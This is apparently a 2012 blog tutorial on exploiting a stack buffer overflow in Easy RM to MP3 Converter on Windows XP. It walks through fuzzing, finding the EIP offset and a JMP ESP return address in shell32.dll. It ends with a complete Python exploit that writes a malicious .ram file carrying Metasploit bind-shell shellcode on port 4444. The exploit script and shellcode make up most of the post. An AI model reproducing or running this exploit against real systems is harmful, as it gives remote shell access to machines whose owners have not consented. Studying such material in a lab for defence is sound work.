Selasa, 25 September 2012

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

In this time i will explore how to exploit Easy RM to Mp3 Converter
You need to know this application is non SEH. You can search meaning of SEH on internet or everywhere.

Ok let's begin

1. Firstly we must have Ollydbg and Easy RM to Mp3 converter to start exploitation

install and run using windows on virtual box

2. Then we need python or something like that to make a fuzzer application to exploit.
I use python to make fuzzer.

i try to type fuzzer like this


#!/usr/bin/python
buffer="http://"+"\x41" * 28000
file="pusing1.ram"
file=open(file, "w")
file.write(buffer)
print("sukses gawe file")
file.close()

it's mean i try to give some waste as much as 2800 and output file is pusing1.ram
save to your directory then run fuzzer on backtrack console
in this case i save that fuzzer on shared folder directory to make easy an acces to this file.







we can see, once fuzzer is run it will generate output. Look picture below there are pusing1.ram as output















3. Run Easy converter on Ollydbg, and load output file 'pusing1.ram' to Easy converter
see what happens in Ollydbg. Cpu register on Ollydbg will display an error / crash














4. After we know that application is crash with 28000 so we generate it using pattern_create.rb. Then copy paste on fuzzer.














5. Rerun the application fuzzer, and see what happens on cpu register. EIP value is change to 326D4831


















 then we will calculate in what number he crashes using pattern_offset.rb function





EIP crashes on 5825 and 26105, ESP crashes on 5833 and 26113
I have tried to use 5825 but it not causes crash, then i use 26105 and really the result is crash

buffer="http://"+"\x90" * 26105
buffer+="\xEF\xBE\xAD\xDE"











EIP value change to DEADBEEF

Then i add ESP value to fuzzer

buffer="http://"+"\x90" * 26105
buffer+="\xEF\xBE\xAD\xDE"
buffer+="http://"+"\x90" * (26113-len(buffer))
buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Rerun the application fuzzer, and you will see






Window stack in Ollydbg containing junk data in the form of charachter \xCC.


6. After that according to exploitation strategy we try to find JMP ESP. 
Run the application fuzzer on Ollydbg. On the menu View select submenu Executetable modules














Double click on SHELL32.dll then find to JMP ESP








We'll find address on shell32.dll which containing JMP ESP command.

Address result is 7C9D30D7.  We try to command application fuzzer to change value on EIP register to be address from JMP ESP inside file shell32.dll.
Firstly we must to change that address to little endian format, from 7C9D30D7 to be \xD7\x30\x9D\x7C
then 
So the fuzzer is 

buffer="http://"+"\x90" * 26105
buffer+="\xD7\x30\x9D\x7C"
buffer+="http://"+"\x90" * (26113-len(buffer))
buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Then pairs the breakpoint to memory 7C9D30D7
Run Easy converter using Ollydbg and rerun the fuzzer application. See what happens









On Cpu register we find SHELL32.7C9D30D7 right behind EIP address. Ollydbg prevent access to 7C9D30D7.

7. The last step is generate payload use metasploit framework. Chose Wind32 bind shell then entry some data like picture below, and click generate button












copy paste payload to fuzzer


#!/usr/bin/python
buffer="http://"+"\x90" * 26105
buffer+="\xD7\x30\x9D\x7C"
#buffer+="http://"+"\x90" * (26113-len(buffer))
#buffer+="http://"+"\xCC" * (28000-len(buffer)) 
buffer+="\x90" * 32
buffer+= ("\xdd\xc3\x31\xc9\xd9\x74\x24\xf4\x5b\xb1\x51\xbf\xa1\x1a\xa8\x27"
"\x83\xc3\x04\x31\x7b\x13\x03\xda\x09\x4a\xd2\xe0\x44\x61\x50\xf0"
"\x60\x8a\x94\xff\xf3\xfe\x07\xdb\xd7\x8b\x9d\x1f\x93\xf0\x18\x27"
"\xa2\xe7\xa8\x98\xbc\x7c\xf1\x06\xbc\x69\x47\xcd\x8a\xe6\x59\x3f"
"\xc3\x38\xc0\x13\xa0\x79\x87\x6c\x68\xb3\x65\x73\xa8\xaf\x82\x48"
"\x78\x14\x43\xdb\x65\xdf\xcc\x07\x67\x0b\x94\xcc\x6b\x80\xd2\x8d"
"\x6f\x17\x0e\x32\xbc\x9c\x59\x58\x98\xbe\x38\x63\xd1\x65\xde\xe8"
"\x51\xaa\x94\xae\x59\x41\xda\x32\xcf\xde\x5b\x42\x51\x89\xd5\x1c"
"\x63\xa5\xba\x5f\xad\x53\x68\xf9\x3a\xaf\xbc\x6d\xcc\xbc\xf2\x32"
"\x66\xbc\x23\xa4\x4d\xaf\x38\x0f\x02\xcf\x17\x30\x2b\xca\xfe\x4f"
"\xc6\x1d\xfd\x1a\x73\x1c\xfe\x74\xeb\xf9\x09\x81\x41\xae\xf6\xbf"
"\xc9\x02\x5a\x6c\xbd\xe7\x0f\xd1\x12\x17\x7f\xb3\xfc\xf6\xdc\x5d"
"\xae\x71\x3d\x34\x38\x26\xa4\x46\x7e\x71\x26\x70\xea\x6e\x89\x29"
"\x14\x5e\x41\x75\x47\x71\x7b\x22\x67\x58\x28\x99\x68\xb5\xa7\xc4"
"\xde\xb0\x71\x51\x1e\x6a\xd1\x09\xb4\xc6\x2d\x61\xa7\x81\x36\xf8"
"\x0e\x28\xee\x05\x58\x9e\xef\x29\x03\x4b\x74\xaf\xa4\xe8\x19\xa6"
"\xd0\x85\xb1\xe1\x33\x96\xbb\xf6\x2e\x62\x35\x1a\x9f\xaa\xb6\x70"
"\x1e\x68\x14\x7a\x9d\x41\xf5\x0f\x58\xa2\x52\xa4\x36\xba\xd6\x44"
"\xfb\x2d\xe8\xcd\xb8\xae\xc0\x76\x16\x03\xbc\xd9\xc9\xc9\x3f\x88"
"\xb8\x58\x11\xd5\xeb\x0b\x3c\xf0\x09\x02\x6d\xfd\xc4\xf0\x6d\xfe"
"\xde\xfb\x42\x8b\x76\xf8\xe0\x4f\x1c\xff\x31\x1d\x22\x2f\xd5\xdf"
"\x04\x32\x55\x4c\x4a\x65\x65\xa2")
file="pusing6.ram"
file=open(file, "w")
file.write(buffer)
print("sukses gawe file")
file.close()


Run Easy converter without Ollydbg then open / load the fuzzer file.









Wawwww, Easy converter has crashes

After run the fuzzer application then run telnet to connect into Windows xp systems via port 4444.







You can see what happens....




CMIIW


Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)